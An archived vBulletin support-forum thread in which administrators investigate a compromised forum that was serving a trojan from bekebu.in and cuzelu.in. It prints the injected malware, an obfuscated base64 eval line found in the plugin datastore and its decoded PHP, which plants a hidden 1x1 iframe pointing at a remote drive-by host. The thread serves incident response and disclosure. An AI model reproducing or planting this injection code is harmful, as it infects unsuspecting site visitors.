vb.org Archive - new 0 day exploit? (bekebu.in / cuzelu.in)

vb.org Archive (https://vborg.vbsupport.ru/index.php)

- vB3 General Discussions (https://vborg.vbsupport.ru/forumdisplay.php?f=111)

- - new 0 day exploit? (bekebu.in / cuzelu.in) (https://vborg.vbsupport.ru/showthread.php?t=245207)

new 0 day exploit? (bekebu.in / cuzelu.in)

I have noticed in the last few days my VB install has been trying to infect users with a trojan coming from bekebu.in &/or cuzelu.in

http://support.clean-mx.de/clean-mx/...n&submit=query

not sure if this was a new 0 day going around or not, but it may be worth someones time to look into this.

:eek:

--------------- Added [DATE]1277395487[/DATE] at [TIME]1277395487[/TIME] ---------------

I have blocked out the /16 that those domains are coming from and google safebrowsing doesn't come up with the malware warning anymore.

91.188.0.0/16

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.188.59.55

http://www.senderbase.org/senderbase...g=91.188.59.55

What file is calling that site?

I finally found the offending code. It is in the datastore/pluginlist table. It's a base64 encoded string.

Code:

\r\n@eval(base64_decode(\"aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlFJywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01lZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDovL3d3dy5mZWFsYXRvYy5jby5jYy9jbG8ucGhwIjsNCmZvcmVhY2ggKCR4YiBhcyAkeGJiKSB7DQppZihzdHJzdHIoc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLHN0cnRvbG93ZXIoJHhiYikpKSB7DQplY2hvIDw8PEhKSg0KPHNjcmlwdD4NCmZ1bmN0aW9uIFNldENvb2tpZShjb29raWVOYW1lLGNvb2tpZUNvbnRlbnQpew0KIHZhciBjb29raWVQYXRoID0gJy8nOw0KIHZhciBleHBEYXRlPW5ldyBEYXRlKCk7DQogZXhwRGF0ZS5zZXRUaW1lKGV4cERhdGUuZ2V0VGltZSgpKzM3MjgwMDAwMCkgIDsNCiB2YXIgZXhwaXJlcz1leHBEYXRlLnRvR01UU3RyaW5nKCk7DQogZG9jdW1lbnQuY29va2llPWNvb2tpZU5hbWUrIj0iK2VzY2FwZShjb29raWVDb250ZW50KSsiO3BhdGg9Iitlc2NhcGUoY29va2llUGF0aCkrIjtleHBpcmVzPSIrZXhwaXJlczsgDQp9DQpTZXRDb29raWUoInhsb3YiLCAiZGF5Iik7DQo8L3NjcmlwdD4NCjxpZnJhbWUgbmFtZT0iJGlmcmFuZCIgd2lkdGg9IjEiIGhlaWdodD0iMSIgc2Nyb2xsaW5nPSJubyIgZnJhbWVib3JkZXI9Im5vIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIiBzcmM9IiRkb21iIj48L2lmcmFtZT4NCkhKSjsNCmJyZWFrOw0KIH0NCiB9DQp9\"));

which resulted in

Code:

if (!isset($_COOKIE['xlov'])) {

$xb = array('MSIE','MyIE','IE','Firefox','Opera','Netscape','Chrome','Safari','Media Center');

$ifrand = mt_rand(0,111);

$domb = "http: // www. fealatoc.co .cc/clo.php";

foreach ($xb as $xbb) {

if(strstr(strtolower($_SERVER['HTTP_USER_AGENT']),strtolower($xbb))) {

echo <<<HJJ

<script>

function SetCookie(cookieName,cookieContent){

 var cookiePath = '/';

 var expDate=new Date();

 expDate.setTime(expDate.getTime()+372800000)  ;

 var expires=expDate.toGMTString();

 document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; 

}

SetCookie("xlov", "day");

</script>

<iframe name="$ifrand" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="$domb"></iframe>

HJJ;

break;

 }

 }

}

--------------- Added [DATE]1277566093[/DATE] at [TIME]1277566093[/TIME] ---------------

the url in the script code is broken on purpose

--------------- Added [DATE]1277566152[/DATE] at [TIME]1277566152[/TIME] ---------------

Thanks to the people over at Tapatalk for helping me figure this out. :wink:

you're running Tapatalk on your vB? or is it just a clean install of vB?

We have been using tapatalk for a while now. Last week a few members started getting virii warnings about bekebu.in &/or cuzelu.in. A few days ago, one the admins @ tapatalk contacted us to let us know they had shut us down on their side due to the virii issue and have helped us locate some of this code.

--------------- Added [DATE]1277640262[/DATE] at [TIME]1277640262[/TIME] ---------------

fealatoc . co . cc info:

http://www.db.ripe.net/whois?form_ty...&submit=Search

http://www.bfk.de/bfk_dnslogger.html?query=91.216.122.7

Post Thanks 'Hack' got hacked.

I guess the question is- did having tapatalk installed contribute to how you got hacked, or were they just helpful in finding it? As I have tapatalk installed I'm curious too.

Tapatalk admins were very helpful with this situation. IMHO, I don't think it has anything to do with the tapatalk plugin. I think it's the post thanks `hack` that is vulnerable, but this will need to be tested and confirmed.

I am not sure either, the information are mixed, some forum didn't install Tapatalk also got hacked. But one forum found a mysterious php file are added to the Tapatalk directory that caught our attention. So we went ahead to check our packaging to make sure the directory is not writable by default (which was an oversight and only happened in one version release).

We have sent out email to all forum owners to upgrade so I hope to keep this infection to the minimum.

X vBulletin 3.8.12 by vBS Debug Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (2)bbcode_code_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)pagenav (1)pagenav_curpage (1)pagenav_pagelink (1)post_thanks_navbar_search (1)printthread (10)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start pagenav_page pagenav_complete bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages:

Phrase Groups Available:

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01081 seconds Memory Usage 1,737KB Queries Executed 10 (?)
More Information
Template Usage: (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (2)bbcode_code_printable (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)pagenav (1)pagenav_curpage (1)pagenav_pagelink (1)post_thanks_navbar_search (1)printthread (10)printthreadbit (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit showthread	Included Files: ./printthread.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/class_bbcode_alt.php ./includes/class_bbcode.php ./includes/functions_bigthree.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete printthread_start pagenav_page pagenav_complete bbcode_fetch_tags bbcode_create bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete printthread_post printthread_complete
Messages: